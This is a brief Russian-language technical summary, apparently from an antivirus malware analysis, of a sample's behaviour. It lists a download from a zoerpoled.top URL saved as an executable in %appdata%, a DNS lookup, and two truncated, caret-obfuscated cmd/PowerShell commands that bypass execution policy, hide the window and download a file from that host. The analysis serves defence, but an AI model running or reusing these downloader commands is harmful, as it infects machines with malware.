Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^werShel^l^.exe ^-EX^EC^UtI^onP^oli^CY byp^asS^ ^-noprOfILe -WinDOw^STy^L^E^ HiDdE^n (^N^Ew-^objEC^T sYsTe^m.net.wEBc^LiE^nT)^.^D^OwNloAD^fiLe(^'http://www.zoerpoled.top/read...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "P^o^werShel^l^.exe ^-EX^EC^UtI^onP^oli^CY byp^asS^ ^-noprOfILe -WinDOw^STy^L^E^ HiDdE^n (^N^Ew-^objEC^T sYsTe^m.net.wEBc^LiE^nT)^.^D^OwNloAD^fiLe(^'http://www.zoerpoled.top/read...' (со скрытым окном)